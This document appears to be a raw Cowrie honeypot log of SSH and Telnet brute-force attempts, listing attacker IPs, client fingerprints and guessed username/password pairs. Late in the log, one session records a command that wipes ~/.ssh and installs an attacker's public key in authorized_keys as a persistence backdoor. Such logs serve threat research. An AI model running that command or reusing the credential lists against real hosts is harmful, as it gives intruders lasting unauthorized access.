{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.622107Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35650,"dst_ip":"1.2.3.4","dst_port":22,"session":"604e6f95b6f0","protocol":"ssh","message":"New connection: 212.227.235.229:35650 (1.2.3.4:22) [session: 604e6f95b6f0]","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.712891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.715278Z","src_ip":"212.227.235.229","session":"604e6f95b6f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.811261Z","src_ip":"212.227.235.229","session":"604e6f95b6f0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:08:22.241333Z","src_ip":"212.227.235.229","session":"604e6f95b6f0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:23.339977Z","src_ip":"212.227.235.229","session":"604e6f95b6f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35656,"dst_ip":"1.2.3.4","dst_port":22,"session":"c23a5286733b","protocol":"ssh","message":"New connection: 212.227.235.229:35656 (1.2.3.4:22) [session: c23a5286733b]","sensor":"my-vps","timestamp":"2025-09-09T10:08:23.435693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:08:23.436861Z","src_ip":"212.227.235.229","session":"c23a5286733b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:08:23.531552Z","src_ip":"212.227.235.229","session":"c23a5286733b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:08:23.963868Z","src_ip":"212.227.235.229","session":"c23a5286733b"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:24.061283Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:24.062380Z","src_ip":"212.227.235.229","session":"c23a5286733b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53702,"dst_ip":"1.2.3.4","dst_port":22,"session":"9471199c1bf1","protocol":"ssh","message":"New connection: 212.227.125.160:53702 (1.2.3.4:22) [session: 9471199c1bf1]","sensor":"my-vps","timestamp":"2025-09-09T10:08:28.020752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:08:28.025676Z","src_ip":"212.227.125.160","session":"9471199c1bf1"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-09-09T10:08:28.075423Z","src_ip":"212.227.125.160","session":"9471199c1bf1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:38.023134Z","src_ip":"212.227.125.160","session":"9471199c1bf1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49404,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd237f69c05f","protocol":"ssh","message":"New connection: 217.72.205.35:49404 (1.2.3.4:22) [session: fd237f69c05f]","sensor":"my-vps","timestamp":"2025-09-09T10:08:41.393946Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:41.394956Z","src_ip":"217.72.205.35","session":"fd237f69c05f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59446,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3ce9a26aeb7","protocol":"ssh","message":"New connection: 212.227.235.229:59446 (1.2.3.4:22) [session: d3ce9a26aeb7]","sensor":"my-vps","timestamp":"2025-09-09T10:08:44.067546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:08:44.072796Z","src_ip":"212.227.235.229","session":"d3ce9a26aeb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:08:44.342272Z","src_ip":"212.227.235.229","session":"d3ce9a26aeb7"}
{"eventid":"cowrie.login.failed","username":"fish","password":"111","message":"login attempt [fish/111] failed","sensor":"my-vps","timestamp":"2025-09-09T10:08:45.441326Z","src_ip":"212.227.235.229","session":"d3ce9a26aeb7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:46.729913Z","src_ip":"212.227.235.229","session":"d3ce9a26aeb7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56188,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4e63fbc6c52","protocol":"ssh","message":"New connection: 212.227.235.229:56188 (1.2.3.4:22) [session: a4e63fbc6c52]","sensor":"my-vps","timestamp":"2025-09-09T10:08:48.130650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:08:48.131993Z","src_ip":"212.227.235.229","session":"a4e63fbc6c52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:08:48.387804Z","src_ip":"212.227.235.229","session":"a4e63fbc6c52"}
{"eventid":"cowrie.login.failed","username":"app","password":"12345678","message":"login attempt [app/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T10:08:49.424679Z","src_ip":"212.227.235.229","session":"a4e63fbc6c52"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:50.691530Z","src_ip":"212.227.235.229","session":"a4e63fbc6c52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41480,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1240df6515c","protocol":"ssh","message":"New connection: 212.227.235.229:41480 (1.2.3.4:22) [session: e1240df6515c]","sensor":"my-vps","timestamp":"2025-09-09T10:09:20.562862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:09:20.567791Z","src_ip":"212.227.235.229","session":"e1240df6515c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:09:20.813967Z","src_ip":"212.227.235.229","session":"e1240df6515c"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"anonymous@2025","message":"login attempt [anonymous/anonymous@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T10:09:21.858189Z","src_ip":"212.227.235.229","session":"e1240df6515c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35668,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bb90cc6e59f","protocol":"ssh","message":"New connection: 212.227.235.229:35668 (1.2.3.4:22) [session: 4bb90cc6e59f]","sensor":"my-vps","timestamp":"2025-09-09T10:09:22.448553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:09:22.449613Z","src_ip":"212.227.235.229","session":"4bb90cc6e59f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:09:22.543420Z","src_ip":"212.227.235.229","session":"4bb90cc6e59f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1qazxsw2","message":"login attempt [ubuntu/1qazxsw2] failed","sensor":"my-vps","timestamp":"2025-09-09T10:09:22.973268Z","src_ip":"212.227.235.229","session":"4bb90cc6e59f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:09:23.115967Z","src_ip":"212.227.235.229","session":"e1240df6515c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:09:24.071603Z","src_ip":"212.227.235.229","session":"4bb90cc6e59f"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":48996,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccff772905bb","protocol":"telnet","message":"New connection: 79.124.8.120:48996 (1.2.3.4:23) [session: ccff772905bb]","sensor":"my-vps","timestamp":"2025-09-09T10:09:28.632955Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:09:28.684313Z","src_ip":"79.124.8.120","session":"ccff772905bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:09:28.763727Z","src_ip":"79.124.8.120","session":"ccff772905bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51734,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0fd73ecbcc7","protocol":"ssh","message":"New connection: 212.227.235.229:51734 (1.2.3.4:22) [session: b0fd73ecbcc7]","sensor":"my-vps","timestamp":"2025-09-09T10:09:58.713396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:09:58.724531Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:09:58.990574Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r5T","message":"login attempt [root/1q2w3e4r5T] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:10:00.271038Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:10:00.846858Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:10:00.849346Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:10:00.851827Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:01.123010Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:10:01.806603Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:10:01.810337Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:10:02.099941Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:10:02.103378Z","src_ip":"212.227.235.229","session":"b0fd73ecbcc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52024,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab39e484ae2e","protocol":"ssh","message":"New connection: 212.227.235.229:52024 (1.2.3.4:22) [session: ab39e484ae2e]","sensor":"my-vps","timestamp":"2025-09-09T10:10:02.379286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:10:02.388600Z","src_ip":"212.227.235.229","session":"ab39e484ae2e"}
